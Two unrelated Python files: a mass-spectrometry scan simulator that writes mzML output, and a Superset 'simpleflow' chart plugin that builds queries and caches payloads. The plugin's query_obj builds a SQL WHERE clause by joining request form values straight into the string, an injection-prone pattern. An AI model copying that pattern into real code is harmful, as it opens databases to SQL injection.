if scale_func == "gauss":
mu = (
peak_properties[f"{molecule}"]["scan_start_time"]
+ 0.5 * peak_properties[f"{molecule}"]["peak_width"]
)
dist_scale_factor = distributions[scale_func](
rt,
mu=mu,
sigma=peak_properties[f"{molecule}"]["peak_params"].get(
"sigma", peak_properties[f"{molecule}"]["peak_width"] / 10
),
)
elif scale_func == "gamma":
dist_scale_factor = distributions[scale_func](
rt,
a=peak_properties[f"{molecule}"]["peak_params"]["a"],
scale=peak_properties[f"{molecule}"]["peak_params"]["scale"],
)
elif scale_func == "gauss_tail":
mu = (
peak_properties[f"{molecule}"]["scan_start_time"]
+ 0.3 * peak_properties[f"{molecule}"]["peak_width"]
)
dist_scale_factor = distributions[scale_func](
rt,
mu=mu,
sigma=0.12 * (rt - peak_properties[f"{molecule}"]["scan_start_time"]) + 2,
scan_start_time=peak_properties[f"{molecule}"]["scan_start_time"],
)
elif scale_func is None:
dist_scale_factor = 1
# TODO use ionization_effiency here
i *= (
dist_scale_factor
* peak_properties[f"{molecule}"].get("peak_scaling_factor", 1e3)
* peak_properties[f"{molecule}"].get("ionization_effiency", 1)
)
return i
def generate_scans(
isotopologue_lib: dict,
peak_properties: dict,
interval_tree: IntervalTree,
fragmentor: AbstractFragmentor,
noise_injector: AbstractNoiseInjector,
mzml_params: dict,
):
"""Summary.
Args:
isotopologue_lib (TYPE): Description
peak_properties (TYPE): Description
fragmentation_function (A): Description
mzml_params (TYPE): Description
"""
logger.info("Initialize chimeric spectra counter")
chimeric_count = 0
chimeric = Counter()
logger.info("Start generating scans")
t0 = time.time()
gradient_length = mzml_params["gradient_length"]
ms_rt_diff = mzml_params.get("ms_rt_diff", 0.03)
t: float = 0
mol_scan_dict: Dict[str, Dict[str, list]] = {}
scans: List[Tuple[Scan, List[Scan]]] = []
# i: int = 0
spec_id: int = 1
de_tracker: Dict[str, int] = {}
de_stats: dict = {}
mol_scan_dict = {
mol: {"ms1_scans": [], "ms2_scans": []} for mol in isotopologue_lib
}
molecules = list(isotopologue_lib.keys())
progress_bar = tqdm(
total=gradient_length,
desc="Generating scans",
bar_format="{desc}: {percentage:3.0f}%|{bar}| {n:.2f}/{total_fmt} [{elapsed}<{remaining}",
)
while t < gradient_length:
scan_peaks: List[Tuple[float, float]] = []
scan_peaks = {}
mol_i = []
mol_monoisotopic = {}
candidates = interval_tree.at(t)
# print(len(candidates))
for mol in candidates:
# if len(candidates) > 1:
mol = mol.data
mol_plus = f"{mol}"
mz = np.array(isotopologue_lib[mol]["mz"])
intensity = np.array(isotopologue_lib[mol]["i"])
intensity = rescale_intensity(
intensity, t, mol, peak_properties, isotopologue_lib
)
mask = intensity > mzml_params["min_intensity"]
intensity = intensity[mask]
# clip max intensity
intensity = np.clip(
intensity, a_min=None, a_max=mzml_params.get("max_intensity", 1e10)
)
mz = mz[mask]
mol_peaks = list(zip(mz, intensity))
mol_peaks = {round(mz, 6): _i for mz, _i in list(zip(mz, intensity))}
# !FIXED! multiple molecules which share mz should have summed up intensityies for that shared mzs
if len(mol_peaks) > 0:
mol_i.append((mol, mz[0], sum(intensity)))
# scan_peaks.extend(mol_peaks)
for mz, intensity in mol_peaks.items():
if mz in scan_peaks:
scan_peaks[mz] += intensity
else:
scan_peaks[mz] = intensity
mol_scan_dict[mol]["ms1_scans"].append(spec_id)
highest_peak = max(mol_peaks.items(), key=lambda x: x[1])
mol_monoisotopic[mol] = {
"mz": highest_peak[0],
"i": highest_peak[1],
}
scan_peaks = sorted(list(scan_peaks.items()), key=lambda x: x[1])
if len(scan_peaks) > 0:
mz, inten = zip(*scan_peaks)
else:
mz, inten = [], []
s = Scan(
{
"mz": np.array(mz),
"i": np.array(inten),
"id": spec_id,
"rt": t,
"ms_level": 1,
}
)
prec_scan_id = spec_id
spec_id += 1
sorting = s.mz.argsort()
s.mz = s.mz[sorting]
s.i = s.i[sorting]
# add noise
s = noise_injector.inject_noise(s)
# i += 1
scans.append((s, []))
t += ms_rt_diff
progress_bar.update(ms_rt_diff)
if t > gradient_length:
break
fragment_spec_index = 0
max_ms2_spectra = mzml_params.get("max_ms2_spectra", 10)
if len(mol_i) < max_ms2_spectra:
max_ms2_spectra = len(mol_i)
ms2_scan = None
mol_i = sorted(mol_i, key=lambda x: x[2], reverse=True)
logger.debug(f"All molecules eluting: {len(mol_i)}")
logger.debug(f"currently # fragment spectra {len(scans[-1][1])}")
mol_i = [
mol
for mol in mol_i
if (de_tracker.get(mol[0], None) is None)
or (t - de_tracker[mol[0]]) > mzml_params["dynamic_exclusion"]
]
logger.debug(f"All molecules eluting after DE filtering: {len(mol_i)}")
while len(scans[-1][1]) != max_ms2_spectra:
logger.debug(f"Frag spec index {fragment_spec_index}")
if fragment_spec_index > len(mol_i) - 1:
# we evaluated fragmentation for every potential mol
# and all will be skipped
logger.debug(f"All possible mol are skipped due to DE")
break
mol = mol_i[fragment_spec_index][0]
_mz = mol_i[fragment_spec_index][1]
_intensity = mol_i[fragment_spec_index][2]
fragment_spec_index += 1
mol_plus = f"{mol}"
all_mols_in_mz_and_rt_window = [
mol.data
for mol in candidates
if (
abs(isotopologue_lib[mol.data]["mz"][0] - _mz)
< mzml_params["isolation_window_width"]
)
]
if len(all_mols_in_mz_and_rt_window) > 1:
chimeric_count += 1
chimeric[len(all_mols_in_mz_and_rt_window)] += 1
if mol is None:
# dont add empty MS2 scans but have just a much scans as precursors
breakpoint()
ms2_scan = Scan(
{
"mz": np.array([]),
"i": np.array([]),
"rt": t,
"id": spec_id,
"precursor_mz": 0,
"precursor_i": 0,
"precursor_charge": 1,
"precursor_scan_id": prec_scan_id,
"ms_level": 2,
}
)
spec_id += 1
t += ms_rt_diff
progress_bar.update(ms_rt_diff)
if t > gradient_length:
break
elif (peak_properties[mol_plus]["scan_start_time"] <= t) and (
(
peak_properties[mol_plus]["scan_start_time"]
+ peak_properties[mol_plus]["peak_width"]
)
>= t
):
# fragment all molecules in isolation and rt window
# check if molecule needs to be fragmented according to dynamic_exclusion rule
if (
de_tracker.get(mol, None) is None
or (t - de_tracker[mol]) > mzml_params["dynamic_exclusion"]
):
logger.debug("Generate Fragment spec")
de_tracker[mol] = t
if mol not in de_stats:
de_stats[mol] = {"frag_events": 0, "frag_spec_ids": []}
de_stats[mol]["frag_events"] += 1
de_stats[mol]["frag_spec_ids"].append(spec_id)
peaks = fragmentor.fragment(all_mols_in_mz_and_rt_window)
frag_mz = peaks[:, 0]
frag_i = peaks[:, 1]
ms2_scan = Scan(
{
"mz": frag_mz,
"i": frag_i,
"rt": t,
"id": spec_id,
"precursor_mz": mol_monoisotopic[mol]["mz"],
"precursor_i": mol_monoisotopic[mol]["i"],
"precursor_charge": peak_properties[mol]["charge"],
"precursor_scan_id": prec_scan_id,
"ms_level": 2,
}
)
spec_id += 1
ms2_scan.i = rescale_intensity(
ms2_scan.i, t, mol, peak_properties, isotopologue_lib
)
ms2_scan = noise_injector.inject_noise(ms2_scan)
ms2_scan.i *= 0.5
else:
logger.debug(f"Skip {mol} due to dynamic exclusion")
continue
t += ms_rt_diff
progress_bar.update(ms_rt_diff)
if t > gradient_length:
break
else:
logger.debug(f"Skip {mol} since not in RT window")
continue
if mol is not None:
mol_scan_dict[mol]["ms2_scans"].append(spec_id)
if ms2_scan is None:
# there are molecules in mol_i
# however all molecules are excluded from fragmentation_function
# => Don't do a scan and break the while loop
# => We should rather continue and try to fragment the next mol!
logger.debug(f"Continue and fragment next mol since MS2 scan is None")
continue
if (
len(ms2_scan.mz) > -1
): # TODO -1 to also add empty ms2 specs; 0 breaks tests currently ....
sorting = ms2_scan.mz.argsort()
ms2_scan.mz = ms2_scan.mz[sorting]
ms2_scan.i = ms2_scan.i[sorting]
logger.debug(f"Append MS2 scan with {mol}")
scans[-1][1].append(ms2_scan)
progress_bar.close()
t1 = time.time()
logger.info("Finished generating scans")
logger.info(f"Generating scans took {t1-t0:.2f} seconds")
logger.info(f"Found {chimeric_count} chimeric scans")
return scans, mol_scan_dict
# @profile
def generate_molecule_isotopologue_lib(
peak_properties: Dict[str, dict],
charges: List[int] = None,
trivial_names: Dict[str, str] = None,
):
"""Summary.
Args:
molecules (TYPE): Description
"""
logger.info("Generate Isotopolgue Library")
start = time.time()
duplicate_formulas: Dict[str, List[str]] = {}
for key in peak_properties:
duplicate_formulas.setdefault(
peak_properties[key]["chemical_formula"], []
).append(key)
if charges is None:
charges = [1]
if len(peak_properties) > 0:
molecules = [d["chemical_formula"] for d in peak_properties.values()]
lib = pyqms.IsotopologueLibrary(
molecules=molecules,
charges=charges,
verbose=False,
trivial_names=trivial_names,
)
reduced_lib = {}
# TODO fix to support multiple charge states
for mol in molecules:
formula = lib.lookup["molecule to formula"][mol]
data = lib[formula]["env"][(("N", "0.000"),)]
for triv in lib.lookup["formula to trivial name"][formula]:
reduced_lib[triv] = {
"mz": data[peak_properties[triv]["charge"]]["mz"],
"i": data["relabun"],
}
else:
reduced_lib = {}
tmp = {}
for mol in reduced_lib:
cc = peak_properties[mol]["chemical_formula"]
for triv in duplicate_formulas[cc]:
if triv not in reduced_lib:
tmp[triv] = reduced_lib[mol]
reduced_lib.update(tmp)
logger.info(
f"Generating IsotopologueLibrary took {(time.time() - start)/60} minutes"
)
return reduced_lib
# @profile
def write_scans(
file: Union[str, io.TextIOWrapper], scans: List[Tuple[Scan, List[Scan]]]
) -> None:
"""Generate given scans to mzML file.
Args:
file (Union[str, io.TextIOWrapper]): Description
scans (List[Tuple[Scan, List[Scan]]]): Description
Returns:
None: Description
"""
t0 = time.time()
logger.info("Start writing Scans")
ms1_scans = len(scans)
ms2_scans = 0
ms2_scan_list = []
for s in scans:
ms2_scans += len(s[1])
ms2_scan_list.append(len(s[1]))
logger.info("Write {0} MS1 and {1} MS2 scans".format(ms1_scans, ms2_scans))
id_format_str = "controllerType=0 controllerNumber=1 scan={i}"
with MzMLWriter(file) as writer:
# Add default controlled vocabularies
writer.controlled_vocabularies()
writer.format()
# Open the run and spectrum list sections
time_array = []
intensity_array = []
with writer.run(id="Simulated Run"):
spectrum_count = len(scans) + sum([len(products) for _, products in scans])
with writer.spectrum_list(count=spectrum_count):
for scan, products in scans:
# Write Precursor scan
try:
index_of_max_i = np.argmax(scan.i)
max_i = scan.i[index_of_max_i]
mz_at_max_i = scan.mz[index_of_max_i]
except ValueError:
mz_at_max_i = 0
max_i = 0
spec_tic = sum(scan.i)
writer.write_spectrum(
scan.mz,
scan.i,
id=id_format_str.format(i=scan.id),
params=[
"MS1 Spectrum",
{"ms level": 1},
{
"scan start time": scan.retention_time,
"unit_name": "seconds",
},
{"total ion current": spec_tic},
{"base peak m/z": mz_at_max_i, "unitName": "m/z"},
{
"base peak intensity": max_i,
"unitName": "number of detector counts",
},
],
)
time_array.append(scan.retention_time)
intensity_array.append(spec_tic)
# Write MSn scans
for prod in products:
writer.write_spectrum(
prod.mz,
prod.i,
id=id_format_str.format(i=prod.id),
params=[
"MSn Spectrum",
{"ms level": 2},
{
"scan start time": prod.retention_time,
"unit_name": "seconds",
},
{"total ion current": sum(prod.i)},
],
precursor_information={
"mz": prod.precursor_mz,
"intensity": prod.precursor_i,
"charge": prod.precursor_charge,
"scan_id": id_format_str.format(i=scan.id),
"spectrum_reference": id_format_str.format(i=scan.id),
"activation": ["HCD", {"collision energy": 25.0}],
},
)
with writer.chromatogram_list(count=1):
writer.write_chromatogram(
time_array,
intensity_array,
id="TIC",
chromatogram_type="total ion current",
)
t1 = time.time()
logger.info(f"Writing mzML took {(t1-t0)/60:.2f} minutes")
return
|
"""This module contains the "Viz" internal simpleflow plugin objects
These plugin objects represent the backend of all the visualizations that
Superset can render for simpleflow
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import copy
import hashlib
import logging
import traceback
import uuid
import zlib
from collections import OrderedDict, defaultdict
from datetime import datetime, timedelta
import pandas as pd
import numpy as np
from flask import request
from flask_babel import lazy_gettext as _
from markdown import markdown
import simplejson as json
from six import string_types, PY3
from dateutil import relativedelta as rdelta
from superset import app, utils, cache
from superset.utils import DTTM_ALIAS
## BaseViz is abstrat class
##from superset.viz_base import Viz, viz_types_list
from superset.viz import Viz
##
from superset.graph import (
BaseGraph
)
config = app.config
stats_logger = config.get('STATS_LOGGER')
### todo. use naming convension, such as prefix all simpleflow controls name to 'sf_'
#mask_json = '{"model_group":"model_id","sex_group":"sex_id","age_select":"age_group_id","location":"country_code", "year_group": "year"}'
mask_json = '{"model_group":"model_id","sex_group":"sex_id","age_select":"age_group_id","location":"location_id"}'
form_data_db_mask = json.loads(mask_json)
class SimpleFlowViz(Viz):
"""All simpleflow visualizations derive this base class"""
viz_type = None
verbose_name = "Base Viz"
credits = ""
is_timeseries = False
def __init__(self, datasource, form_data):
if not datasource:
raise Exception("Viz is missing a datasource")
self.datasource = datasource
self.request = request
self.viz_type = form_data.get("viz_type")
self.form_data = form_data
print("from viz_base.py self.viz_type")
#print(self.viz_type)
self.query = ""
self.token = self.form_data.get(
'token', 'token_' + uuid.uuid4().hex[:8])
self.metrics = self.form_data.get('metrics') or []
self.groupby = self.form_data.get('groupby') or []
self.status = None
self.error_message = None
self.baseGraph = BaseGraph()
def get_df(self, query_obj=None):
"""Returns a pandas dataframe based on the query object"""
if not query_obj:
query_obj = self.query_obj()
##print('BaseViz')
#print('baseviz return query_obj', query_obj)
self.error_msg = ""
self.results = None
timestamp_format = None
if self.datasource.type == 'table':
dttm_col = self.datasource.get_col(query_obj['granularity'])
if dttm_col:
timestamp_format = dttm_col.python_date_format
# The datasource here can be different backend but the interface is common
self.results = self.datasource.query(query_obj)
print('plugins/internal/simpleflow.py get_df self.results, self.results.df', self.results, self.results.df )
self.query = self.results.query
self.status = self.results.status
self.error_message = self.results.error_message
df = self.results.df
# Transform the timestamp we received from database to pandas supported
# datetime format. If no python_date_format is specified, the pattern will
# be considered as the default ISO date format
# If the datetime format is unix, the parse will use the corresponding
# parsing logic.
if df is None or df.empty:
self.status = utils.QueryStatus.FAILED
if not self.error_message:
self.error_message = "No data."
return pd.DataFrame()
else:
if DTTM_ALIAS in df.columns:
if timestamp_format in ("epoch_s", "epoch_ms"):
df[DTTM_ALIAS] = pd.to_datetime(df[DTTM_ALIAS], utc=False)
else:
df[DTTM_ALIAS] = pd.to_datetime(
df[DTTM_ALIAS], utc=False, format=timestamp_format)
if self.datasource.offset:
df[DTTM_ALIAS] += timedelta(hours=self.datasource.offset)
df.replace([np.inf, -np.inf], np.nan)
df = df.fillna(0)
return df
def get_extra_filters(self):
extra_filters = self.form_data.get('extra_filters', [])
return {f['col']: f['val'] for f in extra_filters}
def query_obj(self):
"""Building a query object"""
form_data = self.form_data
groupby = form_data.get("groupby") or []
metrics = form_data.get("metrics") or []
# extra_filters are temporary/contextual filters that are external
# to the slice definition. We use those for dynamic interactive
# filters like the ones emitted by the "Filter Box" visualization
extra_filters = self.get_extra_filters()
granularity = (
form_data.get("granularity") or form_data.get("granularity_sqla")
)
limit = int(form_data.get("limit") or 0)
timeseries_limit_metric = form_data.get("timeseries_limit_metric")
row_limit = int(
form_data.get("row_limit") or config.get("ROW_LIMIT"))
# __form and __to are special extra_filters that target time
# boundaries. The rest of extra_filters are simple
# [column_name in list_of_values]. `__` prefix is there to avoid
# potential conflicts with column that would be named `from` or `to`
since = (
extra_filters.get('__from') or
form_data.get("since") or
config.get("SUPERSET_DEFAULT_SINCE", "1 year ago")
)
from_dttm = utils.parse_human_datetime(since)
now = datetime.now()
if from_dttm > now:
from_dttm = now - (from_dttm - now)
until = extra_filters.get('__to') or form_data.get("until", "now")
to_dttm = utils.parse_human_datetime(until)
if from_dttm > to_dttm:
raise Exception("From date cannot be larger than to date")
# extras are used to query elements specific to a datasource type
# for instance the extra where clause that applies only to Tables
extras = {
'where': form_data.get("where", ''),
'having': form_data.get("having", ''),
'having_druid': form_data.get('having_filters') \
if 'having_filters' in form_data else [],
'time_grain_sqla': form_data.get("time_grain_sqla", ''),
'druid_time_origin': form_data.get("druid_time_origin", ''),
}
print("baseViz extras")
##print(extras)
#print("query_obj baseViz form_data", form_data);
#where_filter_str = ""
### built the filter for dashboard, since slice is now integrated with dashboard
#dashboard_filter_array = []
#try:
## mask_json = '{"model_group":"model_id","sex_group":"sex_id","age_select":"age_group_id","location":"country_code"}'
## form_data_db_mask = json.loads(mask_json)
# where_filter_array = []
# for attr, value in form_data.items():
# if (form_data_db_mask.get(str(attr), None) is not None) and (value is not None) and value and len(value) > 0 :
# where_filter = form_data_db_mask.get(str(attr)) + " in ( " + ",".join(value) + ")"
# where_filter_array.append(where_filter)
# ## build the dashboard_filter_array
# dashboard_filter_array += [{
# 'col': form_data_db_mask.get(str(attr)),
# 'op': 'in',
# 'val': value,
# }]
# if len(where_filter_array) > 0 :
# where_filter_str = " and ".join(where_filter_array)
# ## sample format: age_group_id in ( 1,2,22) and model_id in ( 46,4,7,10,,108,28,38,94,106) and sex_id in ( 3)
# print("viz.py baseViz simpleflow_line where_filter_str, dashboard_filter_array", where_filter_str, dashboard_filter_array)
#
#except Exception as e:
# logging.exception(e)
# print("form_data fields in viz.py is not iterable");
filters = form_data['filters'] if 'filters' in form_data \
else []
for col, vals in self.get_extra_filters().items():
print("viz.py baseViz looping extra_filters col, vals, self.datasource.filterable_column_names", col, vals, self.datasource.filterable_column_names)
if not (col and vals) or col.startswith('__'):
continue
elif col in self.datasource.filterable_column_names:
# Quote values with comma to avoid conflict
filters += [{
'col': col,
'op': 'in',
'val': vals,
}]
elif form_data_db_mask.get(col) in self.datasource.filterable_column_names:
# Quote values with comma to avoid conflict
filters += [{
'col': form_data_db_mask.get(col),
'op': 'in',
'val': map(int, vals),
}]
##filters.extend(dashboard_filter_array)
#print('viz.py baseViz query_obj filters', filters, form_data['filters'])
d = {
'granularity': granularity,
'from_dttm': from_dttm,
'to_dttm': to_dttm,
'is_timeseries': self.is_timeseries,
'groupby': groupby,
'metrics': metrics,
'row_limit': row_limit,
'filter': filters,
'timeseries_limit': limit,
'extras': extras,
'timeseries_limit_metric': timeseries_limit_metric,
'form_data': form_data,
}
##print(d)
return d
@property
def cache_timeout(self):
if self.form_data.get('cache_timeout'):
return int(self.form_data.get('cache_timeout'))
if self.datasource.cache_timeout:
return self.datasource.cache_timeout
if (
hasattr(self.datasource, 'database') and
self.datasource.database.cache_timeout):
return self.datasource.database.cache_timeout
return config.get("CACHE_DEFAULT_TIMEOUT")
def get_json(self, force=False):
return json.dumps(
self.get_payload(force),
default=utils.json_int_dttm_ser, ignore_nan=True)
@property
def cache_key(self):
s = str([(k, self.form_data[k]) for k in sorted(self.form_data.keys())])
return hashlib.md5(s.encode('utf-8')).hexdigest()
def get_payload(self, force=False):
"""Handles caching around the json payload retrieval"""
cache_key = self.cache_key
payload = None
force = force if force else self.form_data.get('force') == 'true'
if not force and cache:
payload = cache.get(cache_key)
if payload:
stats_logger.incr('loaded_from_source')
is_cached = True
try:
cached_data = zlib.decompress(payload)
if PY3:
cached_data = cached_data.decode('utf-8')
payload = json.loads(cached_data)
except Exception as e:
logging.error("Error reading cache: " +
utils.error_msg_from_exception(e))
payload = None
logging.info("Serving from cache")
if not payload:
stats_logger.incr('loaded_from_cache')
data = None
is_cached = False
cache_timeout = self.cache_timeout
stacktrace = None
try:
df = self.get_df()
if not self.error_message:
data = self.get_data(df)
except Exception as e:
logging.exception(e)
if not self.error_message:
self.error_message = str(e)
self.status = utils.QueryStatus.FAILED
data = None
stacktrace = traceback.format_exc()
payload = {
'cache_key': cache_key,
'cache_timeout': cache_timeout,
'data': data,
'error': self.error_message,
'form_data': self.form_data,
'query': self.query,
'status': self.status,
'stacktrace': stacktrace,
}
payload['cached_dttm'] = datetime.utcnow().isoformat().split('.')[0]
logging.info("Caching for the next {} seconds".format(
cache_timeout))
data = self.json_dumps(payload)
if PY3:
data = bytes(data, 'utf-8')
if cache and self.status != utils.QueryStatus.FAILED:
try:
cache.set(
cache_key,
zlib.compress(data),
timeout=cache_timeout)
except Exception as e:
# cache.set call can fail if the backend is down or if
# the key is too large or whatever other reasons
logging.warning("Could not cache key {}".format(cache_key))
logging.exception(e)
cache.delete(cache_key)
payload['is_cached'] = is_cached
return payload
def json_dumps(self, obj):
return json.dumps(obj, default=utils.json_int_dttm_ser, ignore_nan=True)
@property
def data(self):
"""This is the data object serialized to the js layer"""
content = {
'form_data': self.form_data,
'token': self.token,
'viz_name': self.viz_type,
'filter_select_enabled': self.datasource.filter_select_enabled,
}
return content
def get_csv(self):
df = self.get_df()
include_index = not isinstance(df.index, pd.RangeIndex)
return df.to_csv(index=include_index, encoding="utf-8")
def get_data(self, df):
return []
@property
def json_data(self):
return json.dumps(self.data)
class SimpleFlowTsViz(SimpleFlowViz):
"""A rich line chart component with tons of options"""
viz_type = "simpleflow_line"
#viz_type = "line"
verbose_name = _("Time Series - Line Chart")
sort_series = False
is_timeseries = True
def to_series(self, df, classed='', title_suffix=''):
print('SimpleFlowTimeSeriesViz to_series df')
#print(df)
cols = []
for col in df.columns:
if col == '':
cols.append('N/A')
elif col is None:
cols.append('NULL')
else:
cols.append(col)
df.columns = cols
series = df.to_dict('series')
chart_data = []
for name in df.T.index.tolist():
ys = series[name]
if df[name].dtype.kind not in "biufc":
continue
if isinstance(name, string_types):
series_title = name
else:
name = ["{}".format(s) for s in name]
if len(self.form_data.get('metrics')) > 1:
series_title = ", ".join(name)
else:
series_title = ", ".join(name[1:])
if title_suffix:
series_title += title_suffix
d = {
"key": series_title,
"classed": classed,
"values": [
{'x': ds, 'y': ys[ds] if ds in ys else None}
for ds in df.index
],
}
chart_data.append(d)
return chart_data
def get_data(self, df):
fd = self.form_data
#df = df.fillna(0)
query_object = self.query_obj()
df = self.get_df(query_object)
df = df.fillna(0)
print("SimpleFlowTimeSeriesViz get_data, df")
#print(fd)
if fd.get("granularity") == "all":
raise Exception("Pick a time granularity for your time series")
df = df.pivot_table(
index=DTTM_ALIAS,
columns=fd.get('groupby'),
values=fd.get('metrics'))
fm = fd.get("resample_fillmethod")
if not fm:
fm = None
how = fd.get("resample_how")
rule = fd.get("resample_rule")
if how and rule:
df = df.resample(rule, how=how, fill_method=fm)
if not fm:
df = df.fillna(0)
if self.sort_series:
dfs = df.sum()
dfs.sort_values(ascending=False, inplace=True)
df = df[dfs.index]
if fd.get("contribution"):
dft = df.T
df = (dft / dft.sum()).T
rolling_periods = fd.get("rolling_periods")
rolling_type = fd.get("rolling_type")
if rolling_type in ('mean', 'std', 'sum') and rolling_periods:
if rolling_type == 'mean':
df = pd.rolling_mean(df, int(rolling_periods), min_periods=0)
elif rolling_type == 'std':
df = pd.rolling_std(df, int(rolling_periods), min_periods=0)
elif rolling_type == 'sum':
df = pd.rolling_sum(df, int(rolling_periods), min_periods=0)
elif rolling_type == 'cumsum':
df = df.cumsum()
num_period_compare = fd.get("num_period_compare")
if num_period_compare:
num_period_compare = int(num_period_compare)
prt = fd.get('period_ratio_type')
if prt and prt == 'growth':
df = (df / df.shift(num_period_compare)) - 1
elif prt and prt == 'value':
df = df - df.shift(num_period_compare)
else:
df = df / df.shift(num_period_compare)
df = df[num_period_compare:]
chart_data = self.to_series(df)
time_compare = fd.get('time_compare')
if time_compare:
query_object = self.query_obj()
delta = utils.parse_human_timedelta(time_compare)
query_object['inner_from_dttm'] = query_object['from_dttm']
query_object['inner_to_dttm'] = query_object['to_dttm']
query_object['from_dttm'] -= delta
query_object['to_dttm'] -= delta
df2 = self.get_df(query_object)
df2[DTTM_ALIAS] += delta
df2 = df2.pivot_table(
index=DTTM_ALIAS,
columns=fd.get('groupby'),
values=fd.get('metrics'))
chart_data += self.to_series(
df2, classed='superset', title_suffix="---")
chart_data = sorted(chart_data, key=lambda x: x['key'])
return chart_data
## overwrite base class's method query_obj
def query_obj(self):
"""Building a query object"""
form_data = self.form_data
groupby = form_data.get("groupby") or []
metrics = form_data.get("metrics") or []
# extra_filters are temporary/contextual filters that are external
# to the slice definition. We use those for dynamic interactive
# filters like the ones emitted by the "Filter Box" visualization
extra_filters = self.get_extra_filters()
granularity = (
form_data.get("granularity") or form_data.get("granularity_sqla")
)
limit = int(form_data.get("limit") or 0)
timeseries_limit_metric = form_data.get("timeseries_limit_metric")
row_limit = int(
form_data.get("row_limit") or config.get("ROW_LIMIT"))
# __form and __to are special extra_filters that target time
# boundaries. The rest of extra_filters are simple
# [column_name in list_of_values]. `__` prefix is there to avoid
# potential conflicts with column that would be named `from` or `to`
since = (
extra_filters.get('__from') or
form_data.get("since") or
config.get("SUPERSET_DEFAULT_SINCE", "1 year ago")
)
from_dttm = utils.parse_human_datetime(since)
now = datetime.now()
if from_dttm > now:
from_dttm = now - (from_dttm - now)
until = extra_filters.get('__to') or form_data.get("until", "now")
to_dttm = utils.parse_human_datetime(until)
if from_dttm > to_dttm:
raise Exception("From date cannot be larger than to date")
## extras are used to query elements specific to a datasource type
## for instance the extra where clause that applies only to Tables
print(form_data);
where_filter_str = ""
## built the filter for dashboard, since slice is now integrated with dashboard
dashboard_filter_array = []
try:
##mask_json = '{"model_group":"model_id","sex_group":"sex_id","age_select":"age_group_id","location":"country_code"}'
##form_data_db_mask = json.loads(mask_json)
where_filter_array = []
for attr, value in form_data.items():
if (form_data_db_mask.get(str(attr), None) is not None) and (value is not None) and value and not any(isinstance(sublist, list) for sublist in value) and len(value) > 0 :
where_filter = form_data_db_mask.get(str(attr)) + " in ( " + ",".join(value) + ")"
where_filter_array.append(where_filter)
## build the dashboard_filter_array
dashboard_filter_array += [{
'col': form_data_db_mask.get(str(attr)),
'op': 'in',
'val': map(int, value),
}]
if len(where_filter_array) > 0 :
where_filter_str = " and ".join(where_filter_array)
## sample format: age_group_id in ( 1,2,22) and model_id in ( 46,4,7,10,,108,28,38,94,106) and sex_id in ( 3)
print("plugins/internal/simpleflow.py where_filter_str, dashboard_filter_array", dashboard_filter_array, where_filter_str)
except Exception as e:
logging.exception(e)
print("plugins/internal/simpleflow.py exception form_data fields in viz.py is not iterable");
default_form_data_json = '{"resample_fillmethod": null, "show_brush": false, "line_interpolation": "linear", "show_legend": true, "filters": [], "granularity_sqla": "year", "rolling_type": "null", "show_markers": false, "since": "100 years ago", "time_compare": null, "until": "5057", "resample_rule": null, "period_ratio_type": "growth", "metrics": ["avg__model_id", "avg__rt_mean"], "timeseries_limit_metric": null, "resample_how": null, "slice_id": 177, "num_period_compare": "", "viz_type_superset": "table", "level_group": "1", "groupby": ["model_name"], "rich_tooltip": true, "limit": 5000, "datasource": "108__table", "x_axis_showminmax": true, "contribution": false, "time_grain_sqla": "Time Column"}'
default_form_data = json.loads(default_form_data_json)
form_data.update(default_form_data)
#print("plugins/internal/simpleflow.py form_data", form_data, default_form_data)
extras = {
#'where': form_data.get("where", ''),
'where': where_filter_str,
'having': form_data.get("having", ''),
'having_druid': form_data.get('having_filters') \
if 'having_filters' in form_data else [],
'time_grain_sqla': form_data.get("time_grain_sqla", ''),
'druid_time_origin': form_data.get("druid_time_origin", ''),
}
#print(extras)
filters = []
#filters = form_data['filters'] if 'filters' in form_data \
# else []
#for col, vals in self.get_extra_filters().items():
# if not (col and vals) or col.startswith('__'):
# continue
# elif col in self.datasource.filterable_column_names:
# # Quote values with comma to avoid conflict
# filters += [{
# 'col': col,
# 'op': 'in',
# 'val': vals,
# }]
## sample format: [{u'col': u'country_code', u'val': [u'ALB', u'DZA', u'ASM', u'ADO', u'ATG'], u'op': u'in'}]
filters.extend(dashboard_filter_array)
print('plugins/internal/simpleflow.py simpleflow_line query_obj filters', filters, dashboard_filter_array, form_data['filters'])
#data-set for controlSetRows
vis_container_id = form_data.get("viscontainer_group", 1)
vis_id = form_data.get("vistype_group", 1)
viz_type_form = form_data.get("viz_type",1)
search_setting = self.baseGraph.get_search_setting_graph_db(viz_type_form, vis_container_id, vis_id)
#build setting array
panel = {}
sections = []
rows = []
row = []
section_name_index = 1
row_name_index = 2
control_name_index = 3
if len(search_setting) > 0:
section_name = search_setting[0][section_name_index]
row_name = search_setting[0][row_name_index]
counter = 0
for r in search_setting:
### new rows, search_setting has to have ordered by section_name
if section_name != r[section_name_index] :
sections.append({"label": section_name,"description": section_name, "controlSetRows":rows})
section_name = r[section_name_index]
rows = []
row.append(r[control_name_index])
rows.append(row)
row = []
### append the last section
sections.append({"label": section_name,"description": section_name, "controlSetRows":rows})
form_data['search_dependencies_controlSections'] = sections
##rebuild form_data for data from graph-db
search_categories = self.baseGraph.get_search_categories_graph_db(viz_type_form, vis_container_id, vis_id)
search_categories_array = []
##clear all form_data related to setting, can be more effecient
for r in search_categories:
if r[2] != 'model_version':
form_data[r[2]] = []
for r in search_categories:
name = r[2]
#print('search_categories, r, name', r, name)
if r[2] == 'model_version':
name = 'sf_model_version'
if name not in form_data or type(form_data[name]) is not list:
form_data[name] = []
form_data[name].append([r[0],r[1]])
a = { "ID": r[0], "NAME": r[1], "CAT": r[2] }
search_categories_array.append(a)
#attach graph data to form_data
form_data['graph_search_categories'] = search_categories_array;
###
### like to keep these example code which shows how the control-sections
### control-rows and controls are formated in the frontend to generate
### controlpancel inputs
###
##data-set for controlSetRows
#controlSections = []
#controlSetRows = []
#controlSetRows.append(["viz_type"])
#controlSetRows.append(["viscontainer_group"])
#controlSetRows.append(["vistype_group"])
#controlSetRows.append(["measure"])
#controlSetRows.append(["cause"])
#controlSetRows.append(["risk"])
#controlSetRows.append(["age_select"])
#controlSetRows.append(["location"])
#controlSetRows.append(["model_group"])
##controlSetRows.append(["metrics"])
##controlSetRows.append(["groupby"])
##controlSetRows.append(["limit", "timeseries_limit_metric"])
#section = {
# 'label': 'section 1',
# 'description': 'descrition 1',
# 'controlSetRows': controlSetRows,
#}
#controlSections.append(section)
#controlSetRows = []
